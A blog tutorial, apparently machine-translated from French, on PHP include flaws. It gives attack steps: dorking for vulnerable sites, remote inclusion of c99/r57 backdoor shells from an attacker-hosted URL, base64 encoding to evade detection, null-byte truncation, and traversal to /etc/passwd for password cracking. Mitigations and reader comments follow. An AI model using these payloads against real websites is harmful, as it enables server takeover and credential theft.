PHP Include flaw, what is it and how to protect it?

Last updated: January 1, 2023

We have already talked in previous tutorials about the upload flaw and XSS flaw. Today I will present to you the PHP Include flaw which is certainly the most famous PHP flaw in the world of websites, due to a programming error made by a developer who cares little about security.

We will see in detail how to exploit this flaw and of course how to protect yourself from it.

And, no, the article is not going to self-destruct in 5 seconds :), so take the time to read it to learn more about the flaw PHP Include

PHP Include what is it?

This function allows, as its name suggests, to include a page in another, it is used like this:

<?php
include(“page.php”);
?>

Example

SIf all your pages require the mysql.php page in which the database connection information is contained, it should be included in each of your pages rather than re-typing the equivalent of mysql.php in all of them. this.

La PHP include function allow you to have only one mysql.php page, and all the pages of your site will include it (the same case for the menu, header and footer)

How does PHP Include work?

Imagine we have an index.php page with the following code:

<?php
if(isset($_GET['page'])) // check if the _GET variable exists
include($_GET['page']);
else
include('default.php');
?>

If we type: http:// index.php?page=astuces.php

This piece of code will include (and run) the “tips.php” page. So far, nothing too complicated.
Now what will happen if I type the following url:
http://index.php?page=http://www.google.fr

Then the Google page will run and display on our server! Imagine that this page in question is a backdoor like c99.php. We can then take control of the hosting server. This way we can list all the server files, edit them, create them, access the database, etc.

Detect the presence of a PHP Include flaw?

To detect a flaw PHP includes on a website, simply test all possible parameters of a URL and observe the result. The goal is to crash the website by trying to include a page that doesn't exist.
If a URL is vulnerable then we should get a PHP warning like this:

Warning: main ([PARAMETRE_INCORRECT]): failed to open stream: No such file or directory in [URL_DE_LA_PAGE] .php on line [NUMERO_DE_LIGNE]
Warning: main(): Failed opening '[INCORRECT_PARAMETER]' for inclusion (include_path='.:/usr/share/php:/usr/share/pear') in [PAGE_URL].php on line [LINE_NUMBER]

Type one of the two warnings into the search engine and you will find what you are looking for! 😀 You can always try but be aware that it’s illegal!

How to exploit this flaw?

Exploit the include flaw remotely

First of all, you must have a PHP script (backdoor) ready to use.

For that type in google a precise backdoor like r57, c99, c100 myshell, etc.. It is preferable to encode it in base64 encoding so as not to be detected.

Let's say you found the PHP Include flaw on a PHP website, and it allows any page to be included. Now all you have to do is place your backdoor on an FTP server or a free server not running PHP.

Whatever solution you choose, you can therefore call the vulnerable page in this way:
index.php? page = http: //votre-serveur.com/porte-derobee.php
(if it is on an FTP server, obviously replace http: // by ftp: // and indicate the login / pass in the usual way).

And you will see your backdoor showing as follows:

Sometimes, we come across a vulnerable page but with a code different from the one we saw in the previous paragraph, for example:

<?php
if(isset($_GET['page']))
include($_GET['page'] . “.php”);
else
include('default.php');
?>

Here the “.php” extension is automatically added to the variable. This forces our porte-derobee.php file to become porte-derobee.php.php and it will not run on the vulnerable server.

So what?

There is a very simple solution to escape this filter. This is the null byte technique. It consists of placing an ASCII zero at the end of our URL. It will therefore be necessary to include:
index.php? page = http: //notre-serveur.com/porte-derobee.php%00

Explanation

The include() function will be processed by a function programmed in C language. And in C, we designate the end of a character string with a null byte (x00 in classic notation). this is why our character string (porte-derobee.php%00.php) will be truncated by finding the character %00!

The local include flaw

So far we have only sought to include a remote backdoor. But be aware that it is entirely possible, with this flaw, to execute a file located on the vulnerable server! And besides, this is sometimes the only possibility, because Some protections disable the ability to include code located on another server.

We can therefore display all the pages inside the index, like this: http://www.cible.com/index.php?page=/test/test.php
And like this, we will be able to navigate through all the directories of the site, even the server if it is not chmoder

In practice, it's quite simple, in fact we will try to guess in which directory an interesting file like htpasswd is located, by successively testing parameters like “../.htpasswd” or “../../. htpasswd” or “../folder/.htpasswd”.

Or we can go back to the root of the server and then go to the directory that interests us until we see a sensitive file, for example:

http://cible.com/index.php?page=../../../../../../../etc/ passwd

Once the password files are recovered, you can crack them with a suitable program like John The Ripper or Cain.

Here are other files that may be interesting to visit, even if sometimes (like for etc/shadow) it is only accessible to the root user.

/ Etc / passwd
/ Etc / shadow
/ Etc / group
/ etc / security / group
/ etc / security / passwd
/ etc / security / user

Protect yourself from the Include vulnerability

The best way to protect yourself from include PHP is of :

Doing a test for each page of your site, it is certainly long but there is nothing better for you to see afterwards.
if ( $page == » tips ) { include ( » tips. php ) }
if ( $page == » photos) { include ( » photos. php )}
.
else { include (“index.php”) }
In php4, set the allow_url_fopen command to off. The latter allows the reading of files located on another server;
In php5, set the allow_url_include command to off. This is an improvement over php4, which distinguishes files read from files included.

As in all articles, I hope that I met your expectations and that I was able to bring you something new through this post. I also hope that all webmasters are aware of the danger of this flaw.

souhail says:

March 20 2014 to 12 01 h min

Nice as an article…
A question, why is there a white space at the beginning of your values?
1if($page==”tips”) { include(”tips.php”) }
2if($page==”photos”) {include(”photos.php”)}
3.
4.5else { include("index.php") }

yyyy says:

November 4 2012 to 11 33 h min

to secure the flaw, that's not what you have to do, imagine that you have a very dynamic site yes there are hundreds of pages depending on the articles to add it would be impossible to do what you are doing, the best thing would be to scan all the pages of a directory Then to make conditions

boubker says:

23 September 2012 7 to 04 h min

Hello
Obviously this is the right way.
Except instead of doing a test for each page, there is better to do: it is to store our pages in a taleau. and do the verification, it's cleaner:
$tab_pages = array('index', 'tips', 'photos', 'others');
$page = (isset($_GET['page']))? htmlspecialchars($_GET['page']): 'index';
// Tests
if (!empty($_GET['page']) && in_array($page,$tab_pages))
{
include $page.'.php';
Else {}
header ('Refresh:3;URL=./index.php');

echo 'error, page not found';
}

Sadiq Script says:

August 12 2012 to 16 42 h min

We can even store the names of our pages in a DB and do tests each time we detect an include of a page

- Ahmed says:
  
  August 13 2012 to 5 17 h min
  
  Yes Sadiq, It is also a good solution to avoid the include flaw!
  
  - Anonymous says:
    
    10 May 2013 14 in 40 h min
    
    it's the sql flaw that needs to be secured afterwards: p